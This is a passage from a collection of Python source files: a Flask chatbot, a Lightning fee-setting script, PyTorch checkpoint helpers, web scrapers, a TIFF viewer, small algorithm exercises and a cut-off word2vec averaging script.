I hope you're doing well.\"]\n\ndef greeting(sentence):\n \"\"\"If user's input is a greeting, return a greeting response\"\"\"\n # for word in sentence:\n if sentence.lower() in GREETING_INPUTS:\n return random.choice(GREETING_RESPONSES)\n else:\n return None\n\n\n# Generating response\ndef response(user_response):\n robo_response=''\n sent_tokens.append(user_response)\n TfidfVec = TfidfVectorizer(tokenizer=LemNormalize, stop_words='english')\n tfidf = TfidfVec.fit_transform(sent_tokens)\n vals = cosine_similarity(tfidf[-1], tfidf)\n idx=vals.argsort()[0][-2]\n flat = vals.flatten()\n flat.sort()\n req_tfidf = flat[-2]\n if(req_tfidf==0):\n robo_response=robo_response+\"I am sorry! I did not understand this.\"\n return robo_response\n else:\n robo_response = robo_response+sent_tokens[idx]\n return robo_response\n\n\n\n \n#GUI starts\napp = Flask(__name__)\n\n@app.route('/home')\ndef index():\n return render_template('index.html')\n\n@app.route('/home', methods=['POST'])\ndef feedback():\n experience=request.form['experience']\n comments = request.form['Comments']\n name = request.form['name1']\n email = request.form['email']\n\n #storing the feedback with timestamp\n dateTimeObj = datetime.now()\n\n timestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S.%f)\")\n\n f = open(\"feedback.txt\", \"a\")\n if(experience=='good'):\n \tflag ='1'\n elif(experience=='average'):\n \tflag='2'\n else:\n \tflag='3'\n f.write(timestampStr +\",\"+ \"experience: \" + experience +\",\" + flag +\",\" + \"Comments: \" + comments +\",\" + \"name: \" + name +\",\" + \"email: \" + email +\"\\n\")\n f.close()\n return render_template('index.html')\n\n\n\n\n\n\n\n@app.route('/process',methods=['POST'])\ndef process():\n leave = ['bye', 'good bye', 'see ya', 'see you later', 'take care', 'cheerio']\n user_input=request.form['user_input']\n user_response=user_input.lower()\n if(user_response not in leave):\n if(user_response=='thanks' or user_response=='thank you'):\n # flag=False\n bot_response = \"You are welcome...\"\n # print(bot_response)\n else:\n if(greeting(user_response)!= None):\n bot_response = greeting(user_response)\n # print(bot_response)\n else:\n bot_response = response(user_response)\n #print(bot_response)\n sent_tokens.remove(user_response)\n else:\n bot_response = random.choice(leave)\n # print(bot_response)\n\n # bot_response=response(user_response)\n bot_response=str(bot_response)\n # print(bot_response)\n # print(\"USER: \" + user_response)\n # print(\"SFIT: \"+bot_response)\n\n #storing the chats with timestamp\n dateTimeObj = datetime.now()\n timestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S.%f)\")\n\n f = open(\"chats_storage.txt\", \"a\")\n \n if(bot_response=='I am sorry! 
I did not understand this.'):\n \tflag1='0'\n else:\n \tflag1='1'\n \n f.write(timestampStr +\",\"+ \"USER: \" + user_response +\",\"+ \"SFIT: \"+ bot_response +\",\"+ flag1 +\"\\n\")\n\n # timestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S.%f)\")\n #print(t_count)\n \n f.close()\n\n\n # bot_response = \"flask try karra hu hojaa fatafat...\"\n return render_template('index.html', user_input=user_response, bot_response=bot_response)\n\nif __name__=='__main__':\n app.run(debug=True, port = 5001)\n\n\n","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"12320514","text":"from car_controller.SlamDataModel import SlamDataModel\nimport car_controller.slam_proto_pb2 as slam_pb\nimport zmq\nimport threading\nimport time\n\nclass RemoteSlamController():\n def __init__(self,\n slam_data_model: SlamDataModel,\n slam_Server_address):\n self.slam_Server_address = slam_Server_address\n self.active = True\n self.slam_map_pb = slam_pb.SlamMap()\n self.slam_data_model = slam_data_model\n context = zmq.Context()\n self.map_socket_init(context)\n threading.Thread(target = self.receive_slam_thread, daemon=True).start()\n\n def map_socket_init(self, context):\n self.map_socket = context.socket(zmq.SUB)\n self.map_socket.connect(\"tcp://\" + self.slam_Server_address + \":5555\")\n self.map_socket.setsockopt(zmq.SUBSCRIBE, b'')\n self.map_socket.setsockopt(zmq.RCVHWM, 2)\n self.map_socket.setsockopt(zmq.RCVBUF, 1024)\n\n def receive_slam_thread(self):\n while True:\n if self.active:\n data = self.map_socket.recv()\n self.slam_map_pb.ParseFromString(data)\n\n self.slam_data_model.set_position(self.slam_map_pb.x,\n self.slam_map_pb.y,\n self.slam_map_pb.theta)\n\n self.slam_data_model.set_map(bytearray(self.slam_map_pb.grid))\n self.slam_data_model.set_map_dimentions(self.slam_map_pb.width, self.slam_map_pb.height)\n else:\n time.sleep(1)\n\n def set_active(self, state):\n self.active = state\n","sub_path":"car_controller/RemoteSlamController.py","file_name":"RemoteSlamController.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236782400","text":"#!/usr/bin/env python3\n\"\"\"\nThis script is provided for educational purposes, it sets channel\nfees based on chain costs and imbalance.\nThis far more basic than similar tools and likely not flexible enough\nfor advanced operators, but it should give a good idea of what a fair\nfee is to beginners.\nRun `python3 feesetter.py -h` for parameters.\n\"\"\"\n\nimport argparse\n\nimport numpy as np\n\nfrom nodeinterface import NodeInterface\n\n# Handle arguments\nparser = argparse.ArgumentParser(description='Set channel rate fees based on simple heuristics')\nparser.add_argument('--chainfee', type=int, default=6000,\n help='The estimated cost in sats of opening and closing a channel, accounting for force close risk and hiring fees, default 6000')\nparser.add_argument('--passes', type=int, default=2,\n help='The number of times channels must be fully used to break even, default 2')\nparser.add_argument('--rebalfactor', type=int, default=10,\n help='This factor controls how agressively fees will adjust with channel imbalance, default 10')\nparser.add_argument('--basefee', type=int, default=50,\n help='The base fee in msat to apply to all channels, default 50')\nparser.add_argument('--minhtlc', type=int,\n help='If basefee is 0 
this will be automatically set to prevent free forwards')\nparser.add_argument('--sink', action='append', default=[],\n help='Specify the pubkeys of nodes that receive vastly more than they send')\nparser.add_argument('--timelockdelta', type=int, default=40,\n help='The time lock delta to apply to all channels, default 40')\nparser.add_argument('--apply', action=\"store_true\",\n help='By default fees are suggested but not applied, set this flag to apply them')\nargs = parser.parse_args()\n\nmynode = NodeInterface.fromconfig()\n\n# Find channel ratios and average channel size\n# Using an average prevents overcharging for small channels and\n# undercharging for large ones\nchansizes = []\nchanratios = {}\nmychannels = mynode.ListChannels().channels\nbalancesbypeer = {}\nfor chan in mychannels:\n # Need channel size to get average\n effective_capacity = (chan.capacity\n - chan.local_constraints.chan_reserve_sat\n - chan.remote_constraints.chan_reserve_sat)\n chansizes.append(effective_capacity)\n\n # Need these ratios when printing\n remote_ratio = chan.remote_balance / chan.capacity\n chanratios[chan.channel_point] = remote_ratio\n\n if chan.remote_pubkey not in balancesbypeer:\n balancesbypeer[chan.remote_pubkey] = {\n 'local':0,'remote':0, 'total':0}\n\n balancesbypeer[chan.remote_pubkey]['local'] += chan.local_balance\n balancesbypeer[chan.remote_pubkey]['remote'] += chan.remote_balance\n balancesbypeer[chan.remote_pubkey]['total'] += chan.capacity\n\n# Find the basic rate fee\nbasicratefee = args.chainfee / np.mean(chansizes) / args.passes\n\n# Modify the rate fee for each channel for channel balance\ndef imbalancemodifier(remote_ratio):\n # The [0-1] integral of the function must equal 1\n factor = 1+args.rebalfactor*(remote_ratio-0.5)**5\n return max(factor, 0) # Make sure it's not negative\n\nif imbalancemodifier(0) <= 0:\n raise ValueError('--rebalfactor is too large, fees could be zero or negative')\n\n\nnewratefeesbypeer = {}\nminhtlcsbypeer = {}\nfor rkey, balances in balancesbypeer.items():\n ratio = balances['remote'] / balances['total']\n ratefee = basicratefee * imbalancemodifier(ratio)\n\n newratefeesbypeer[rkey] = ratefee\n\n if rkey in args.sink:\n # We only have one pass to profit from, account for this\n ratefee *= args.passes\n\n # If base fee is 0, set min htlc to prevent free forwards\n if args.basefee <= 0:\n minhtlc = int(np.ceil(1/ratefee))\n if args.minhtlc:\n minhtlc = max(minhtlc, args.minhtlc)\n minhtlcsbypeer[rkey] = minhtlc\n elif args.minhtlc:\n minhtlcsbypeer[rkey] = args.minhtlc\n\n\n# Print the proposed fees\nprint('basefee rate minhtlc remote cap Alias')\nprint(' (msat) fee (msat) ratio (ksat) ')\nfor chan in mychannels:\n rate_fee = newratefeesbypeer[chan.remote_pubkey]\n remote_ratio = chanratios[chan.channel_point]\n base_fee = args.basefee\n\n if chan.remote_pubkey in args.sink:\n # Assume only 1 end-to end movement of funds\n # remove the effect of the passes factor previously added\n rate_fee *= args.passes * 1.1\n\n if chan.remote_pubkey in minhtlcsbypeer:\n minhtlc = minhtlcsbypeer[chan.remote_pubkey]\n else:\n minhtlc = chan.local_constraints.min_htlc_msat\n\n print('{:6} {:.3%} {:5} {:4.0%} {:5.0f} {}'.format(\n base_fee, rate_fee, minhtlc, remote_ratio,\n chan.capacity/1e3, mynode.getAlias(chan.remote_pubkey)))\n\nif args.apply:\n print('Applying fees')\n\n for chan in mychannels:\n kwargs = dict(\n chan_point = chan.channel_point,\n fee_rate = newratefeesbypeer[chan.remote_pubkey],\n base_fee_msat = args.basefee,\n time_lock_delta = 
args.timelockdelta,\n            # ~ max_htlc_msat = int(chan.capacity*1000*0.4)\n        )\n        if chan.remote_pubkey in minhtlcsbypeer:\n            kwargs['min_htlc_msat_specified'] = True\n            kwargs['min_htlc_msat'] = minhtlcsbypeer[chan.remote_pubkey]\n\n        mynode.UpdateChannelPolicy(**kwargs)\n\n    print('Fees applied')\n\n\n\n\n\n\n","sub_path":"setfeepolicy.py","file_name":"setfeepolicy.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315565114","text":"import torch\nimport torch.nn as nn\nimport os\n\n\ndef weights_init(m):\n    classname = m.__class__.__name__\n\n    # match on 'Conv' (capitalized), since torch layer class names are Conv2d etc.\n    if classname.find('Conv') != -1:\n        nn.init.normal_(m.weight.data,0.0,0.02)\n    elif classname.find('BatchNorm') != -1:\n        nn.init.normal_(m.weight.data, 1.0, 0.02)\n        nn.init.constant_(m.bias.data, 0)\n\n\ndef initModel(self, device):\n    resultpath = os.path.join(self.result_root, 'checkpoint.pth')\n    if os.path.isfile(resultpath):\n        print(\"restoring checkpoint\")\n        checkpoint = torch.load(resultpath, map_location=device)\n        self.model.load_state_dict(checkpoint['model'])\n        self.optim.load_state_dict(checkpoint['optim'])\n        self.epoch = checkpoint['epoch']\n        self.loss = checkpoint['loss']\n        for state in self.optim.state.values():\n            for k, v in state.items():\n                if torch.is_tensor(v):\n                    state[k] = v.cuda()\n    else:\n        self.model.apply(weights_init)\n\n    self.model.to(device)\n\n\ndef saveCheckpoint(self, filename):\n    path = os.path.join(self.result_root, filename)\n    torch.save({\n        'epoch': self.epoch,\n        'model': self.model.state_dict(),\n        'optim': self.optim.state_dict(),\n        'loss': self.loss\n    }, path)\n","sub_path":"Model/InitModel.py","file_name":"InitModel.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448433403","text":"import requests\nimport urllib.request\nimport urllib.parse\nimport lxml.html\nimport time\nbqg_url=\"https://www.biquge.com/\" # base URL used to join relative chapter links\nurl=\"https://www.biquge.com/28_28334/\"\nchapter_url=[]\nchapter_url_list1=[]\nheaders = {\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Chrome/60.0.3100.0 Safari/537.36'\n    }  \nrequest= urllib.request.Request(url=url, headers=headers)\nresponse=urllib.request.urlopen(request)\nhtml=lxml.html.parse(response)\nhrefs=html.xpath('//*[@id=\"list\"]/dl/dd[*]/a/text()')\nchapter_url_list=html.xpath('//*[@id=\"list\"]/dl/dd[*]/a/@href') # gives a list like [/28_28334/1558940.html , /28_28334/1558940.html ......] 
\ntitle=hrefs[12:]\nfor chapter_url in chapter_url_list[12:]:\n    chapter_url_list1.append(urllib.parse.urljoin(bqg_url,chapter_url)) # join each relative link to the base URL so it can be used\n\ndef read_chapter(url): \n    request1= urllib.request.Request(url=url, headers=headers)\n    response1=urllib.request.urlopen(request1)\n    html1=lxml.html.parse(response1)\n    name=html1.xpath('//*[@class=\"bookname\"]/h1/text()')[0] # find the chapter title\n    content=[]\n    contents=html1.xpath('//*[@id=\"content\"]/text()') # find the list of content lines\n    for i in contents:\n        content+=\"\\n\\n\"+\" \"+i.strip() # add paragraph formatting to the content\n    content = \"\".join(content) # turn the list into a string\n    content=content.replace(\"wWw。QВ5.coМ//\", \"\")\n    content=content.replace(\"最新全本:、、、、、、、、、、\", \"\") # strip the ads from the content\n    with open('C:\\\\Users\\\\admin\\\\Desktop\\\\code\\\\water_margin\\\\水浒传\\\\' +name+'.txt','w+') as f:\n        f.write(content.strip()) # create the txt file\n    print(name+' downloaded successfully')\n\nif __name__ == \"__main__\":\n    for x in chapter_url_list1: # iterate over every url\n        time.sleep(10)\n        read_chapter(x)\n\n    \n","sub_path":"code/water_margin/water.py","file_name":"water.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"172901996","text":"from GaussianElimination_splines import simpleGaussianElimination,partialGaussianElimination,totalGaussianElimination\n\n\ndef matrix_lin(x, b):\n    a = [[0 for i in range((len(x)-1)*2)] for j in range((len(x)-1)*2)]\n    a[0][0] = x[0]\n    a[0][1] = 1\n    a[1][0] = x[1]\n    a[1][1] = 1\n\n    j = 2\n    for i in range(2,len(x)):\n        a[i][j] = x[i]\n        a[i][j+1] = 1\n        j += 2\n    \n    i = 1\n    j = 0\n    for k in range(len(x),((len(x)*2)-2)):\n        b += [0]\n        a[k][j] = x[i]\n        a[k][j+1] = 1\n        a[k][j+2] = -x[i]\n        a[k][j+3] = -1\n        i += 1\n        j += 2\n\n    return a,b\n    \ndef traces(x):\n    \n    \n    result = \"\"\n    for i in range(len(x)):\n        if i % 2 == 0:\n            if x[i] >= 0.0:\n                result += \"+\"+str(x[i])+\"x\"\n            else:\n                result += str(x[i])+\"x\"\n        else:\n            if x[i] >= 0.0:\n                result += \"+\"+str(x[i])+\" \"\n            else:\n                result += str(x[i])+\" \"\n    \n    print(\"\\n Traces: \\n\")\n    for i in result.split(\" \"):\n        print(i)\n    \n\n\nif __name__ == \"__main__\":\n    x = [-1,0,3,4]\n    y = [15.5,3,8,1]\n    b = y\n    A, b = matrix_lin(x,b)\n    print(\"A: \\n\"+str(A))\n    print(\"b: \\n\"+str(b))\n    t1=totalGaussianElimination(A, b)\n    #t2=partialGaussianElimination(A, b)\n    #t3=simpleGaussianElimination(A, b)\n\n    traces(t1)\n    #traces(t3)","sub_path":"Metodos/Trazlin_spline.py","file_name":"Trazlin_spline.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"597173142","text":"#\n# Created on Mar 7, 2017\n#\n# @author: dpascualhe\n#\n# Based on @nuriaoyaga code:\n# https://github.com/RoboticsURJC-students/2016-tfg-nuria-oyaga/blob/\n# master/camera/camera.py\n#\n# And @Javii91 code:\n# https://github.com/Javii91/Domotic/blob/master/Others/cameraview.py\n#\n\nimport sys\nimport random\nimport traceback\nimport threading\n\nimport cv2\nimport numpy as np\nimport easyiceconfig as EasyIce\nfrom PIL import Image\nfrom jderobot import CameraPrx\n\n\nclass Camera:\n\n    def __init__ (self,cam):\n        ''' Camera class gets images from live video. 
'''\n\n self.cam = cam\n self.count = 0\n self.lock = threading.Lock()\n\n if self.cam.hasproxy():\n self.im = self.cam.getImage()\n self.im_height = self.im.height\n self.im_width = self.im.width\n\n print('Image size: {0}x{1} px'.format(\n self.im_width, self.im_height))\n else:\n raise SystemExit(\"Interface camera not connected\")\n\n def getImage(self):\n ''' Gets the image from the webcam and returns the original image. '''\n if self.cam:\n im = np.frombuffer(self.im.data, dtype=np.uint8)\n im = self.transformImage(im)\n im = np.reshape(im, (540, 404, 3))\n return im\n \n def transformImage(self, im):\n im_resized = np.reshape(im, (self.im_height, self.im_width, 3))\n im_resized = cv2.resize(im_resized, (404, 540))\n return im_resized\n\n def update(self):\n ''' Updates the camera every time the thread changes. '''\n if self.cam:\n self.lock.acquire()\n\n self.im = self.cam.getImage()\n self.im_height = self.im.height\n self.im_width = self.im.width\n\n self.lock.release()\n \n ","sub_path":"Camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323192045","text":"import sys\nsys.stdin = open('2819_input.txt')\n\ndr = [-1, 1, 0, 0]\ndc = [0, 0, -1, 1]\nresult = set()\n\ndef find_num(cr, cc, num):\n if len(num) == 7:\n result.add(num)\n return\n \n for i in range(4):\n row, col = cr+dr[i], cc+dc[i]\n if arr[row][col] != -1:\n find_num(row, col, num + arr[row][col])\n\nT = int(input())\nfor tc in range(1, T+1):\n N = 4\n # input 받아서 벽 만들기\n arr = [[-1]*(N+2)]\n for _ in range(N):\n arr.append([-1] + list(input().split()) + [-1])\n arr.append([-1]*(N+2))\n\n for i in range(1, N+1):\n for j in range(1, N+1):\n find_num(i, j, arr[i][j])\n \n print(\"#{} {}\".format(tc, len(result)))\n","sub_path":"0310/swea_2819.py","file_name":"swea_2819.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"9240289","text":"highscore_string=input(\"Insert high scores: \")\nhighscore=highscore_string.split(',')\nl=len(highscore)\nfor i in range(l):\n highscore[i]=int(highscore[i])\nfor i, item in enumerate(highscore):\n print(i+1,\".\",item)\nwhile True:\n add=int(input(\"Add a new highscore: \"))\n highscore.append(add)\n highscore_sorted=sorted(highscore, reverse=True)\n for i, items in enumerate(highscore_sorted):\n print(i+1,\".\",items)\n if i==4:\n break\n","sub_path":"Session8/high_score.py","file_name":"high_score.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"89724210","text":"global primes_GLOBL\n\nprimes_GLOBL = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101]\n\ndef factoration(number):\n factors = []\n\n result = number/1\n\n while result != 1:\n\n for pri in primes_GLOBL:\n if result % pri == 0:\n factors.append(pri)\n result = result/pri\n break\n\n return factors[::-1]\n\n\ndef factors_handling(factors, primes_test):\n\n test_two = factors.count(2)//3\n\n if test_two < 1:\n return factors, primes_test\n\n for i in range(test_two): # Test conditions\n if factors[0] == 2:\n # Continue this function\n break\n elif factors.count(2) % 3 == 0 and factors[0] != 3:\n # End this fuction\n return factors, primes_test\n else:\n # Continue this function\n break\n\n for i in range(test_two):\n primes_test.pop()\n 
factors.pop()\n\n if factors[0] == 3 and factors[0] == factors[1]:\n factors[0] = factors[0]*2\n continue\n\n factors[-1] = factors[-1]*2\n factors.sort(reverse=True)\n\n return factors, primes_test\n\n\ntimes = input()\ncheck_list = []\n\nfor _ in range(times):\n check_list.append(input())\n\nfor num in check_list:\n prime_factors = []\n result = num\n while result != 1:\n for pri in primes_GLOBL:\n if result % pri == 0:\n prime_factors.append(pri)\n result = result / pri\n break\n prime_factors = prime_factors[::-1]\n\n primes_list = primes_GLOBL[:len(prime_factors)]\n\n prime_factors, primes_list = factors_handling(prime_factors, primes_list)\n\n min_number = 1\n index = 0\n for prime_number in primes_list:\n x = (prime_number ** (prime_factors[index] - 1))\n min_number = min_number * x\n index += 1\n\n print(num,':',min_number % 1000000007, end=', ')","sub_path":"Uri/2869_v3_py2.py","file_name":"2869_v3_py2.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"82829528","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 10 12:14:34 2015\n\n@author: robot\n\"\"\"\nfrom __future__ import (absolute_import, division,print_function, unicode_literals)\nfrom future.builtins import (bytes, dict, int, list, object, range, str, ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\nimport time\ntic=time.time()\nimport os, sys\nimport numpy as np\nfrom pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph as pg\nimport tifffile\nimport json\nimport re\n\nclass Viewer(QtGui.QMainWindow):\n \n def __init__(self):\n super(Viewer, self).__init__()\n \n self.initUI()\n \n def initUI(self): \n\n self.ImageView = pg.ImageView()\n self.resize(800,800)\n self.setCentralWidget(self.ImageView)\n self.statusBar()\n\n openTiff = QtGui.QAction(QtGui.QIcon('open.png'), 'Open tiff', self)\n openTiff.setShortcut('Ctrl+O')\n openTiff.setStatusTip('Open new File')\n openTiff.triggered.connect(self.openDialog)\n \n saveFile = QtGui.QAction(QtGui.QIcon('save.png'), 'Save', self)\n saveFile.setShortcut('Ctrl+S')\n saveFile.setStatusTip('Save File')\n saveFile.triggered.connect(self.saveDialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openTiff)\n fileMenu.addAction(saveFile)\n \n #self.setGeometry(300, 300, 350, 300)\n self.setWindowTitle('ImageView')\n self.show()\n\n\n def txt2dict(metadata):\n meta=dict()\n try:\n metadata=json.loads(metadata.decode('utf-8'))\n return metadata\n except ValueError: #if the metadata isn't in JSON\n pass\n for line in metadata.splitlines():\n line=re.split('[:=]',line)\n if len(line)==1:\n meta[line[0]]=''\n else:\n meta[line[0].lstrip().rstrip()]=line[1].lstrip().rstrip()\n return meta\n\n\n def open_file(self,filename):\n\n self.statusBar().showMessage('Loading {}'.format(os.path.basename(filename)))\n t=time.time()\n Tiff=tifffile.TiffFile(filename)\n try:\n metadata=Tiff[0].image_description\n metadata = self.txt2dict(metadata)\n except AttributeError:\n metadata=dict()\n tif=Tiff.asarray().astype(np.float64)\n Tiff.close() \n #tif=imread(filename,plugin='tifffile').astype(g.m.settings['internal_data_type'])\n if len(tif.shape)>3: # WARNING THIS TURNS COLOR movies TO BLACK AND WHITE BY AVERAGING ACROSS THE THREE CHANNELS\n tif=np.mean(tif,3)\n tif=np.squeeze(tif) #this gets rid of the meaningless 4th dimention in .stk files\n if len(tif.shape)==3: #this could either be a movie or a colored still frame\n if 
tif.shape[2]==3: #this is probably a colored still frame\n tif=np.mean(tif,2)\n tif=np.transpose(tif,(1,0)) # This keeps the x and y the same as in FIJI. \n else:\n tif=np.transpose(tif,(0,2,1)) # This keeps the x and y the same as in FIJI. \n elif len(tif.shape)==2: # I haven't tested whether this preserved the x y and keeps it the same as in FIJI. TEST THIS!!\n tif=np.transpose(tif,(0,1))\n self.statusBar().showMessage('{} successfully loaded ({} s)'.format(os.path.basename(filename), time.time()-t))\n return tif \n\n \n def openDialog(self):\n\n filename = QtGui.QFileDialog.getOpenFileName(self, 'Open tiff file', \n '/home', '*.tif *.tiff *.stk')\n \n filename=str(filename)\n if filename=='':\n return False\n else:\n data = self.open_file(filename)\n print(len(data.shape))\n self.ImageView.setImage(data)\n \n \n\n def saveDialog(self):\n \n fname = QtGui.QFileDialog.getSaveFileName(self, 'Save file', \n '/home')\n \n f = open(fname, 'r')\n \n with f: \n data = f.read()\n print(data) \n\n \ndef main():\n if QtCore.QCoreApplication.instance() != None:\n app = QtCore.QCoreApplication.instance()\t\n else:\n app = QtGui.QApplication(sys.argv)\n ex = Viewer()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n \n","sub_path":"ImageView.py","file_name":"ImageView.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599577342","text":"from sys import stdin\nimport math\n\nfor line in stdin:\n if line.find('.') != -1:\n fao, fractional = [x for x in line[:len(line)-1].split('.')]\n else:\n fractional = '0'\n\n if fractional != \"\":\n fractional = float('.'+fractional)\n else:\n fractional = float('.0')\n\n line = float(line[:len(line)-1])\n\n cutoff = float(input())\n\n if fractional>cutoff:\n print(int(math.ceil(line)))\n else:\n print(int(math.floor(line)))\n \n","sub_path":"URI/1305 Cut Off Rounder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"330767478","text":"\n\ndef print_tagged_ptr(debugger,verbose,tptr,toplevel=False):\n global global_HeaderStruct\n if (generalp(tptr)):\n base = untag_general(tptr)\n header_ptr = base - global_HeaderStruct._sizeof\n header = debugger.read_memory(header_ptr,8)\n if (header):\n stamp = header>>4\n if (verbose): debugger.print_(\"header@%x stamp = %d\" % (header_ptr,stamp))\n class_ = global_Kinds[stamp]\n name = class_._name\n printed = print_shallow_object_type(debugger,verbose,0,tptr,toplevel)\n if (printed): return\n debugger.print_(\"a %s\" % name )\n if (isinstance(class_,ClassKind)):\n for field in class_._fields.values():\n val = read_unsigned_at_offset(debugger,verbose,base,field._field_offset)\n debugger.print_(\"field %s: %s\" % (field._field_name,valid_tptr(val)))\n type_ = field._data_type\n print_shallow_object_type(debugger,verbose,\" \",val,type_,toplevel=False)\n if (class_._variable_array0):\n print_variable_array0(debugger,verbose,\" \",class_,tptr,toplevel=False)\n return\n return\n if (consp(tptr)):\n cons = Cons_O(untag_cons(tptr))\n debugger.print_(\"It's a cons\")\n debugger.print_(\"print_tagged_ptr handle: %s\\n\" % tptr)\n\n\n\n","sub_path":"lldb-clasp/clasp_inspect/old_printer.py","file_name":"old_printer.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"561477973","text":"import 
urllib.request\nimport requests\nfrom bs4 import BeautifulSoup\n\nreq = requests.get('https://icons8.com/icons/pack/free-icons')\nprint(req.status_code)\nsoup = BeautifulSoup(req.content,\"lxml\") \nimages = soup.find_all(\"div\",attrs={\"class\":\"icon\"})\ni = 1\nfor image in images:\n    print(image.find(\"a\",attrs={\"class\":\"icon-link\"}).img.get('src'))\n    urllib.request.urlretrieve(image.find(\"a\",attrs={\"class\":\"icon-link\"}).img.get('src'),\"img/{}.png\".format(i))\n    i+=1\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566834609","text":"import time\nimport inspect\nimport traceback\n\nfrom contextlib import contextmanager\nfrom globals import logger\n\n\n@contextmanager\ndef log_this(context_alias, threshold=0):\n    \"\"\"\n    Context manager that logs how long the wrapped block took\n    :param context_alias: alias for the code snippet; avoid duplicates, the suggested form is {class_name}_{func_name}_{alias}\n    :param threshold:\n    :return:\n    \"\"\"\n    timer = time.perf_counter\n    _start = timer()\n    try:\n        yield\n    finally:\n        end = timer()\n        elapsed = (end - _start) * 1000\n        if threshold <= 0 or threshold < elapsed:\n            try:\n                c = {\n                    \"context_alias\": context_alias,\n                    \"func_stack\": str(inspect.stack()[2]),\n                    \"time\": elapsed,\n                    \"timestamp\": time.time()\n                }\n                logger.info(c)\n            except Exception as e:\n                logger.warning(\"log_this error: {}\".format(traceback.format_exc()))\n","sub_path":"util/common/context_manager.py","file_name":"context_manager.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"15049644","text":"import gensim\nfrom gensim.models import Word2Vec\nfrom gensim.test.utils import datapath, get_tmpfile\nfrom gensim.models.keyedvectors import KeyedVectors\nimport numpy as np\nimport pandas as pd\nfrom gensim.scripts.glove2word2vec import glove2word2vec\nimport string\n\n\ndef readfiles(filename):\n\twith open(filename, 'r') as f:\n\t\tc = f.readlines()\n\tdata = [x.strip().split(' ') for x in c]\n\tcat_dict = {}\n\tfor i in data:\n\t\tcat_dict[i[0]]= i[1:]\n\treturn cat_dict\n\n\ndef readfilePandas(filename):\n    df = pd.read_csv(filename, engine='python', header=None, names=['entity'])\n    t = df.values.tolist()\n    text = [item for sublist in t for item in sublist]\n    return text\n\ndef loadmodel(embedding_file):\n    # conversion = glove2word2vec(embedding_file, wiki2vecfile)\n    model = KeyedVectors.load_word2vec_format(embedding_file)\n    return model\n\n\ndef avgvectors(category,model):\n    for c in string.punctuation:\n        category = category.replace(c,\" \").lower()\n    category = \" \".join(category.split())\n    tmp = []\n    print('category name--------')\n    print(category)\n    for i in category.split(' '):\n        try:\n            tmp.append(model[i])\n        except:\n            print('inside except')\n            z= np.zeros((300,), dtype=int)\n            tmp.append(z)\n    print('no of vectors for the word, ',category, 'is, ', len(tmp))\n    vec_avg = np.mean(tmp, axis=0)\n    return vec_avg\n\ndef getVectors(cat_dict, wiki2vec_embed, op_vectorsFile):\n\tcat_vec = {}\n\tfor k,v in cat_dict.items():\n\t\ttmp = []\n\t\tprint('Russa -->',k)\n\t\tfor i in v:\n\t\t\tword = avgvectors(i,wiki2vec_embed)\n\t\t\ttmp.append(word)\n\t\tcat_avg = np.mean(tmp, axis=0)\n\t\top_vectorsFile.write(k+ '\\t' +str(len(tmp)) +'\\t'+ ' '.join([str(elem) for elem in cat_avg]))\n\t\top_vectorsFile.write('\\n')\n\t\tcat_vec[k] = cat_avg\n\treturn cat_vec\n\n\n\n\nif __name__ == \"__main__\":\n\tembed = 
